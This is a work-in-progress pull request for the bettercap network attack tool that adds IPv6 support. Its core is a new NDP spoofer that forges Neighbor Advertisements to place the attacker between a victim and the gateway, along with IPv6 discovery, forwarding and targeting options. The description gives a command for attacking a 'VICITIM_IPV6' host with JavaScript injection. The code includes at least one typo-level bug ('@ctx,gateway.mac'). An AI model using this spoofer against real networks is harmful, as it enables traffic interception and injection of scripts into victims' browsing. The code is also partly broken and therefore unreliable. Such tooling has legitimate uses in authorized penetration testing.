### PR TITLE
[WIP] Ipv6 support 

### DIFF
--- a/lib/bettercap/context.rb
+++ b/lib/bettercap/context.rb
@@ -80,11 +80,20 @@ class Context
 
   # Update the Context state parsing network related informations.
   def update!
-    gw = @options.core.gateway || Network.get_gateway
-    raise BetterCap::Error, "Could not detect the gateway address for interface #{@options.core.iface}, "\
-                            'make sure you\'ve specified the correct network interface to use and to have the '\
-                            'correct network configuration, this could also happen if bettercap '\
-                            'is launched from a virtual environment.' unless Network::Validator.is_ip?(gw)
+    if @options.core.use_ipv6
+      gw = @options.core.gateway || Network.get_ipv6_gateway
+      raise BetterCap::Error, "Could not detect the gateway address for interface #{@options.core.iface}, "\
+                              'make sure you\'ve specified the correct network interface to use and to have the '\
+                              'correct network configuration, this could also happen if bettercap '\
+                              'is launched from a virtual environment.' unless Network::Validator.is_ipv6?(gw)
+
+    else
+      gw = @options.core.gateway || Network.get_gateway
+      raise BetterCap::Error, "Could not detect the gateway address for interface #{@options.core.iface}, "\
+                              'make sure you\'ve specified the correct network interface to use and to have the '\
+                              'correct network configuration, this could also happen if bettercap '\
+                              'is launched from a virtual environment.' unless Network::Validator.is_ip?(gw)
+    end
 
     unless @options.core.use_mac.nil?
       cfg = PacketFu::Utils.ifconfig @options.core.iface

--- a/lib/bettercap/context.rb
+++ b/lib/bettercap/context.rb
@@ -219,7 +219,7 @@ class Context
 
     Logger.debug 'Disabling port redirections ...'
     @redirections.each do |r|
-      @firewall.del_port_redirection( r )
+      @firewall.del_port_redirection( r, @options.core.use_ipv6 )
     end
 
     Logger.debug 'Restoring firewall state ...'
@@ -238,7 +238,7 @@ class Context
     @redirections = @options.get_redirections(@iface)
     @redirections.each do |r|
       Logger.debug "Redirecting #{r.protocol} traffic from #{r.src_address.nil? ? '*' : r.src_address}:#{r.src_port} to #{r.dst_address}:#{r.dst_port}"
-      @firewall.add_port_redirection( r )
+      @firewall.add_port_redirection( r, @options.core.use_ipv6 )
     end
   end
 

--- a/lib/bettercap/context.rb
+++ b/lib/bettercap/context.rb
@@ -127,7 +127,7 @@ class Context
 
     @packets = Network::PacketQueue.new( @iface.name, @options.core.packet_throttle, 4 )
     # Spoofers need the context network data to be initialized.
-    @spoofer = @options.spoof.parse_spoofers
+    @spoofer = @options.spoof.parse_spoofers(self)
 
     if @options.core.discovery?
       tstart = Time.now

--- a/lib/bettercap/context.rb
+++ b/lib/bettercap/context.rb
@@ -113,7 +113,13 @@ class Context
 
     @gateway = Network::Target.new gw
     @targets = @options.core.targets unless @options.core.targets.nil?
-    @iface   = Network::Target.new( cfg[:ip_saddr], cfg[:eth_saddr], cfg[:ip4_obj], cfg[:iface] )
+
+    if @options.core.use_ipv6
+      @iface   = Network::Target.new( cfg[:ip6_saddr], cfg[:eth_saddr], cfg[:ip6_obj], cfg[:iface] )
+    else
+      @iface   = Network::Target.new( cfg[:ip_saddr], cfg[:eth_saddr], cfg[:ip4_obj], cfg[:iface] )
+    end
+
     raise BetterCap::Error, "Could not determine MAC address of '#{@options.core.iface}', make sure this interface "\
                             'is active and connected.' unless Network::Validator::is_mac?(@iface.mac)
 

--- a/lib/bettercap/discovery/agents/ndp.rb
+++ b/lib/bettercap/discovery/agents/ndp.rb
@@ -1,0 +1,43 @@
+# Parse the NDP table searching for new hosts.
+module BetterCap
+module Discovery
+module Agents
+# Class responsible of sending NDP probes to each possible IP on the network.
+class Ndp < Discovery::Agents::Base
+  private
+
+  # Send a Neighbor Solicitation packet in order to update neighbor discovery table,
+  #  with target's mac.
+  # The packet is a broadcast message, so mac is created by "33:33:ff" prefix plus the
+  # 24 least significant bits of the address.
+  # Similar rule applies to the destination address. Multicast address is formed from
+  # the network prefix ff02::1:ff00:0/104 and the 24 least significant bits of the address.
+  def get_probe( ip )
+    split_ip = ip.split(':')
+    dst_mac = "33:33:ff:" + split_ip[-2][-2,2] + ":" + split_ip[-1][0,2] + ":" + split_ip[-1][2,2]
+    dst_ip = "ff02::1:ff" + split_ip[-2][-2,2] + ":" + split_ip[-1]
+
+    p = PacketFu::NDPPacket.new
+
+    p.eth_daddr = dst_mac
+    p.eth_saddr = @ctx.iface.mac
+    p.eth_proto = 0x86dd
+
+    p.ipv6_saddr = @ctx.iface.ip
+    p.ipv6_daddr = dst_ip
+
+    p.ndp_type = 135
+    p.ndp_taddr = ip.to_s
+    p.ndp_opt_type = 1
+    p.ndp_opt_len = 1
+    p.ndp_lladdr = @ctx.iface.mac
+
+    p.ipv6_recalc
+    p.ndp_recalc
+
+    p
+  end
+end
+end
+end
+end

--- a/lib/bettercap/firewalls/linux.rb
+++ b/lib/bettercap/firewalls/linux.rb
@@ -20,10 +20,18 @@ class Linux < Base
   IP_FORWARD_PATH = IPV4_PATH + "/ip_forward"
   ICMP_BCAST_PATH = IPV4_PATH + "/icmp_echo_ignore_broadcasts"
   SEND_REDIRECTS_PATH = IPV4_PATH + "/conf/all/send_redirects"
+  IPV6_PATH = "/proc/sys/net/ipv6"
+  IPV6_FORWARD_PATH = IPV6_PATH + "/conf/all/forwarding"
 
   def supported?
     # Avoids stuff like this https://github.com/evilsocket/bettercap/issues/341
     File.file?(IP_FORWARD_PATH)
+  end
+
+  # If +enabled+ is true will enable packet forwarding, otherwise it will
+  # disable it.
+  def enable_ipv6_forwarding(enabled)
+    File.open(IPV6_FORWARD_PATH,'w') { |f| f.puts "#{enabled ? 1 : 0}"}
   end
 
   # If +enabled+ is true will enable packet forwarding, otherwise it will
@@ -36,6 +44,12 @@ class Linux < Base
   def forwarding_enabled?
     File.open(IP_FORWARD_PATH) { |f| f.read.strip == '1' }
   end
+
+  # Return true if packet forwarding for IPv6 is currently enabled, otherwise false.
+  def ipv6_forwarding_enabled?
+    File.open(IPV6_FORWARD_PATH) { |f| f.read.strip == '1' }
+  end
+
 
   # If +enabled+ is true will enable packet icmp_echo_ignore_broadcasts, otherwise it will
   # disable it.

--- a/lib/bettercap/monkey/packetfu/utils.rb
+++ b/lib/bettercap/monkey/packetfu/utils.rb
@@ -130,7 +130,7 @@ module PacketFu
             ret[:ip_src] = [IPAddr.new($1).to_i].pack('N')
             ret[:ip4_obj] = IPAddr.new($1)
             ret[:ip4_obj] = ret[:ip4_obj].mask($3) if $3
-          when /inet6 [a-z]+:[\s]*([0-9a-fA-F:\x2f]+)/
+          when /(fe80[^\/]*)/
             begin
               ret[:ip6_saddr] = $1
               ret[:ip6_obj] = IPAddr.new($1)

--- a/lib/bettercap/network/ndp_reader.rb
+++ b/lib/bettercap/network/ndp_reader.rb
@@ -1,0 +1,35 @@
+module BetterCap
+module Network
+# This class is responsible for reading the computer ARP table.
+class NdpReader
+  # Parse the Ndp cache searching for the given IP +address+ and return its
+  # MAC if found, otherwise nil.
+  def self.find_address( address )
+    self.parse_cache(address) do |ip,mac|
+      if ip == address
+        return mac
+      end
+    end
+    nil
+  end
+
+  private
+
+  # Read the computer NDP cache and parse each line, it will yield each
+  # ip and mac address it will be able to extract.
+  def self.parse_cache(address)
+    iface = Context.get.iface.name
+    Shell.ndp.split("\n").each do |line|
+      if line.include?(address) && line.include?(iface)
+        m = line.split
+        ip = m[0]
+        hw = Target.normalized_mac( m[4] )
+        if hw != 'FF:FF:FF:FF:FF:FF'
+          yield( ip, hw )
+        end
+      end
+    end
+  end
+end
+end
+end

--- a/lib/bettercap/network/network.rb
+++ b/lib/bettercap/network/network.rb
@@ -92,10 +92,19 @@ class << self
   # Return the hardware address associated with the specified +ip_address+ using
   # the +iface+ network interface.
   def get_hw_address( ctx, ip )
-    hw = ArpReader.find_address( ip )
+    hw = nil
+    if ctx.options.core.use_ipv6
+      hw = NdpReader.find_address( ip )
+    else
+      hw = ArpReader.find_address( ip )
+    end
     if hw.nil?
       start_agents( ctx, ip )
-      hw = ArpReader.find_address( ip )
+      if ctx.options.core.use_ipv6
+        hw = NdpReader.find_address( ip )
+      else
+        hw = ArpReader.find_address( ip )
+      end
     end
     hw
   end

--- a/lib/bettercap/network/network.rb
+++ b/lib/bettercap/network/network.rb
@@ -30,6 +30,21 @@ class << self
     nil
   end
 
+  # Return the current network's IPv6 gateway or nil.
+  def get_ipv6_gateway
+    route6 = Shell.execute('route -A inet6')
+    iface = Context.get.options.core.iface
+
+    Logger.debug "ROUTE6:\n#{route6}"
+
+    route6.split(/\n/).select {|n| n =~ /UG/ }.each do |line|
+      Network::Validator.each_ipv6_gateway(line) do |address|
+        return address
+      end
+    end
+    nil
+  end
+
   # Return a list of IP addresses associated to this device network interfaces.
   def get_local_ips
     ips = []

--- a/lib/bettercap/network/network.rb
+++ b/lib/bettercap/network/network.rb
@@ -139,8 +139,12 @@ class << self
   # complete their job.
   # If +address+ is not nil only that ip will be probed.
   def start_agents( ctx, address = nil )
-    [ 'Icmp', 'Udp', 'Arp' ].each do |name|
-      BetterCap::Loader.load("BetterCap::Discovery::Agents::#{name}").new(ctx, address)
+    if ctx.options.core.use_ipv6
+      BetterCap::Loader.load("BetterCap::Discovery::Agents::Ndp").new(ctx, address)
+    else
+      [ 'Icmp', 'Udp', 'Arp' ].each do |name|
+        BetterCap::Loader.load("BetterCap::Discovery::Agents::#{name}").new(ctx, address)
+      end
     end
     ctx.packets.wait_empty( ctx.timeout )
   end

--- a/lib/bettercap/network/target.rb
+++ b/lib/bettercap/network/target.rb
@@ -47,7 +47,7 @@ class Target
   # ip address will be parsed from the computer ARP cache and updated
   # accordingly.
   def initialize( ip, mac=nil, network=nil, name=nil )
-    if Network::Validator.is_ip?(ip)
+    if Network::Validator.is_ip?(ip) or Network::Validator.is_ipv6?(ip)
       @ip         = ip
       @ip_refresh = false
     elsif Network::Validator.is_mac?(ip)

--- a/lib/bettercap/network/validator.rb
+++ b/lib/bettercap/network/validator.rb
@@ -36,6 +36,8 @@ class Validator
     (%.+)?\s*$/x
   # Quite self explainatory :)
   IP_OCTECT_MAX    = 255
+  # Basic expression for default IPv6 gateway.
+  IPV6_GATEWAY_REGEX = /fe80[^\s]*/
 
   # Return true if +ip+ is a valid IP address, otherwise false.
   def self.is_ip?(ip)
@@ -64,6 +66,13 @@ class Validator
   def self.each_ip(data)
     data.scan(/(#{IP_ADDRESS_REGEX})/).each do |m|
       yield( m[0] ) if m[0] != '0.0.0.0'
+    end
+  end
+
+  # Extract default IPv6 gateway address from +data+.
+  def self.each_ipv6_gateway(data)
+    data.scan(/(#{IPV6_GATEWAY_REGEX})/).each do |m|
+      yield ( m[0] )
     end
   end
 

--- a/lib/bettercap/network/validator.rb
+++ b/lib/bettercap/network/validator.rb
@@ -16,6 +16,24 @@ module Network
 class Validator
   # Basic expression to validate an IP address.
   IP_ADDRESS_REGEX = '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})'
+  # Basic expression to validate an IPv6 address.
+  IPV6_REGEX = /^\s*((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|
+    (([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|
+    [1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]
+    {1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]
+    ?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:)
+    {4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]
+    \d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))
+    |(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]
+    {1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|
+    1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4})
+    {1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)
+    (\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:)
+    {1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|
+    2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))
+    |(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|
+    2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))
+    (%.+)?\s*$/x
   # Quite self explainatory :)
   IP_OCTECT_MAX    = 255
 
@@ -25,6 +43,12 @@ class Validator
       return $~.captures.all? { |i| i.to_i <= IP_OCTECT_MAX }
     end
     false
+  end
+
+  # Return true if +ip+ is a valid IPv6 address, otherwise false.
+  def self.is_ipv6?(ip)
+    result = ip =~ IPV6_REGEX
+    return result ? true : false
   end
 
   # Return true if +port+ is a valid port, otherwise false.

--- a/lib/bettercap/options/core_options.rb
+++ b/lib/bettercap/options/core_options.rb
@@ -41,6 +41,8 @@ class CoreOptions
   attr_accessor :check_updates
   # If not nil, the interface MAC address will be changed to this value.
   attr_accessor :use_mac
+  # If true, IPv6 target endpoints are enabled.
+  attr_accessor :use_ipv6
 
   def initialize( iface )
     @iface           = iface
@@ -56,6 +58,7 @@ class CoreOptions
     @packet_throttle = 0.0
     @check_updates   = false
     @use_mac         = nil
+    @use_ipv6        = false
   end
 
   def parse!( ctx, opts )
@@ -83,6 +86,11 @@ class CoreOptions
 
     opts.on( '-T', '--target ADDRESS1,ADDRESS2', 'Target IP addresses, if not specified the whole subnet will be targeted.' ) do |v|
       self.targets = v
+    end
+
+    opts.on( '-t', '--target6 ADDRESS1,ADDRESS2', 'Target IPv6 addresses.' ) do |v|
+        @use_ipv6 = true
+        self.targets = v
     end
 
     opts.on( '--ignore ADDRESS1,ADDRESS2', 'Ignore these addresses if found while searching for targets.' ) do |v|
@@ -158,7 +166,7 @@ class CoreOptions
     @targets = []
 
     value.split(",").each do |t|
-      if Network::Validator.is_ip?(t) or Network::Validator.is_mac?(t)
+      if Network::Validator.is_ip?(t) or Network::Validator.is_mac?(t) or Network::Validator.is_ipv6?(t)
         @targets << Network::Target.new(t)
 
       elsif Network::Validator.is_range?(t)
@@ -172,7 +180,7 @@ class CoreOptions
         end
 
       else
-        raise BetterCap::Error, "Invalid target specified '#{t}', valid formats are IP addresses, "\
+        raise BetterCap::Error, "Invalid target specified '#{t}', valid formats are IP/IPv6 addresses, "\
                                 "MAC addresses, IP ranges ( 192.168.1.1-30 ) or netmasks ( 192.168.1.1/24 ) ."
       end
     end

--- a/lib/bettercap/options/core_options.rb
+++ b/lib/bettercap/options/core_options.rb
@@ -84,6 +84,11 @@ class CoreOptions
       raise BetterCap::Error, "The specified gateway '#{v}' is not a valid IPv4 address." unless Network::Validator.is_ip?(v)
     end
 
+    opts.on( '--gateway6 ADDRESS', 'Manually specify the IPv6 gateway address, if not specified the current gateway will be retrieved and used. ' ) do |v|
+      @gateway = v
+      raise BetterCap::Error, "The specified gateway '#{v}' is not a valid IPv6 address." unless Network::Validator.is_ipv6?(v)
+    end
+
     opts.on( '-T', '--target ADDRESS1,ADDRESS2', 'Target IP addresses, if not specified the whole subnet will be targeted.' ) do |v|
       self.targets = v
     end

--- a/lib/bettercap/options/spoof_options.rb
+++ b/lib/bettercap/options/spoof_options.rb
@@ -55,11 +55,19 @@ class SpoofOptions
     @spoofer.upcase != 'NONE'
   end
 
+  # Change default ARP with NDP spoofer in case the target endpoint uses IPv6.
+  def calibrate_default_spoofer(ctx)
+    if ctx.options.core.use_ipv6
+      @spoofer = 'NDP'
+    end
+  end
+
 
   # Parse spoofers and return a list of BetterCap::Spoofers objects. Raise a
   # BetterCap::Error if an invalid spoofer name was specified.
-  def parse_spoofers
+  def parse_spoofers(ctx)
     valid = []
+    calibrate_default_spoofer(ctx)
     @spoofer.split(",").each do |module_name|
       valid << Spoofers::Base.get_by_name( module_name )
     end

--- a/lib/bettercap/proxy/http/proxy.rb
+++ b/lib/bettercap/proxy/http/proxy.rb
@@ -62,7 +62,12 @@ class Proxy
   # Start this proxy instance.
   def start
     begin
-      @socket = TCPServer.new( @address, @port )
+      # If IPv6 is enabled, we must specify iface for current link local address since it's not unique.
+      if Context.get.options.core.use_ipv6 
+        @socket = TCPServer.new( @address + "%" +  Context.get.options.core.iface , @port )
+      else 
+        @socket = TCPServer.new( @address, @port )
+      end
 
       if @is_https
         @sslserver = SSL::Server.new( @socket, @upstream_port )

--- a/lib/bettercap/shell.rb
+++ b/lib/bettercap/shell.rb
@@ -77,6 +77,12 @@ module Shell
     def arp
       self.execute( 'LANG=en && arp -a -n' )
     end
+
+    # Get the NDP table cached on this computer.
+    def ndp
+      self.execute( 'ip -6 neighbor show')
+    end
+
   end
 end
 end

--- a/lib/bettercap/spoofers/ndp.rb
+++ b/lib/bettercap/spoofers/ndp.rb
@@ -1,0 +1,144 @@
+# encoding: UTF-8
+
+module BetterCap
+module Spoofers
+# This class is responsible of performing NDP spoofing on the network.
+class Ndp < Base
+  # Initialize the BetterCap::Spoofers::NDP object.
+  def initialize
+    @ctx          = Context.get
+    @forwarding   = @ctx.firewall.ipv6_forwarding_enabled?
+    @spoof_thread = nil
+    @sniff_thread = nil
+    @capture      = nil
+    @running      = false
+
+    update_gateway!
+  end
+
+  # Send a spoofed NDP reply to the target identified by the +daddr+ IP address
+  # and +dmac+ MAC address, spoofing the +saddr+ IP address and +smac+ MAC
+  # address as the source device.
+  def send_spoofed_packet( saddr, smac, daddr, dmac )
+    pkt = PacketFu::NDPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+    pkt.eth_proto = 0x86dd
+
+    pkt.ipv6_saddr = saddr
+    pkt.ipv6_daddr = daddr
+    pkt.ipv6_recalc
+
+    if @ctx.gateway.ip == daddr
+      pkt.ndp_set_flags = "001"
+    else
+      pkt.ndp_set_flags = "111"
+    end
+
+    pkt.ndp_type = 136
+    pkt.ndp_taddr = saddr
+    pkt.ndp_opt_type = 2
+    pkt.ndp_opt_len = 1
+    pkt.ndp_lladdr = smac
+
+    pkt.ndp_recalc
+
+    @ctx.packets.push(pkt)
+  end
+
+  # Start the NDP spoofing.  
+  def start
+    Logger.debug "Starting NDP spoofer ( #{@ctx.options.spoof.half_duplex ? 'Half' : 'Full'} Duplex ) ..."
+
+    stop() if @running
+    @running = true
+
+    if @ctx.options.spoof.kill
+      Logger.warn "Disabling packet forwarding."
+      @ctx.firewall.enable_ipv6_forwarding(false) if @forwarding
+    else
+      @ctx.firewall.enable_ipv6_forwarding(true) unless @forwarding
+    end
+
+    @sniff_thread = Thread.new { ndp_watcher }
+    @spoof_thread = Thread.new { ndp_spoofer }
+  end
+
+  # Stop the NDP spoofing, reset firewall state and restore targets IPv6 table.
+  def stop
+    raise 'NDP spoofer is not running' unless @running
+
+    Logger.debug 'Stopping NDP spoofer ...'
+
+    @running = false
+    begin
+      @spoof_thread.exit
+    rescue
+    end
+
+    Logger.debug "Restoring IPv6 table of #{@ctx.targets.size} targets ..."
+
+    @ctx.targets.each do |target|
+      if target.spoofable?
+        5.times do
+          spoof(target, true)
+          sleep 0.3
+        end
+      end
+    end
+
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+
+    @ctx.firewall.enable_forwarding( @forwarding )
+  end
+
+  private
+
+  # Send an NDP spoofing packet to +target+, if +restore+ is true it will
+  # restore its IPv6 cache instead.
+  def spoof( target, restore = false )
+    if restore
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.gateway.mac, target.ip, target.mac )
+      send_spoofed_packet( target.ip, target.mac, @ctx.gateway.ip, @ctx,gateway.mac ) unless @ctx.options.spoof.half_duplex
+    else
+      # tell the target we're the gateway
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.iface.mac, target.ip, target.mac )
+      # tell the gateway we're the target
+      send_spoofed_packet( target.ip, @ctx.iface.mac, @ctx.gateway.ip, @ctx.gateway.mac ) unless @ctx.options.spoof.half_duplex
+    end
+  end
+
+  # Main spoofer loop.
+  def ndp_spoofer
+    spoof_loop(1) { |target|
+      if target.spoofable?
+        spoof(target)
+      end
+    }
+  end
+
+  # Return true if the +pkt+ packet is an NDP 'who-has' query coming
+  # from some network endpoint.
+  def is_ndp_query?(pkt)
+    begin
+      # we're only interested in 'who-has' packets
+      return ( pkt.ndp_type == 135 and \
+               pkt.ipv6_saddr.to_s != @ctx.iface.ip )
+    rescue; end
+    false
+  end
+
+  # Will watch for incoming Neighbor Solicitation messages and spoof the source address.
+  def ndp_watcher
+    Logger.debug 'NDP watcher started ...'
+
+    sniff_packets('icmp6') { |pkt|
+      if is_ndp_query?(pkt)
+        Logger.info "[#{'NDP'.green}] #{pkt.ipv6_saddr.to_s} is asking who #{pkt.ipv6_daddr.to_s} is."
+        send_spoofed_packet pkt.ipv6_daddr.to_s, @ctx.iface.mac, pkt.ipv6_saddr.to_s, pkt.eth_saddr
+      end
+    }
+  end
+end
+end
+end


### PR DESCRIPTION
Depends on PR [ https://github.com/packetfu/packetfu/pull/160 ] on PacketFu. This patch supports MitM attacks on IPv6 endpoints with Javascript Injection ( possibly all modules, not tested for others yet ). However not all user options are implemented, as in the initial IPv4 version.
It is executed with the command: sudo bettercap -t VICITIM_IPV6 --proxy --proxy-module injectjs --js-file PATH_TO_JS_FILE --no-ssltrip . 
The PacketFu Library with the Neighbor Discovery PR is also required.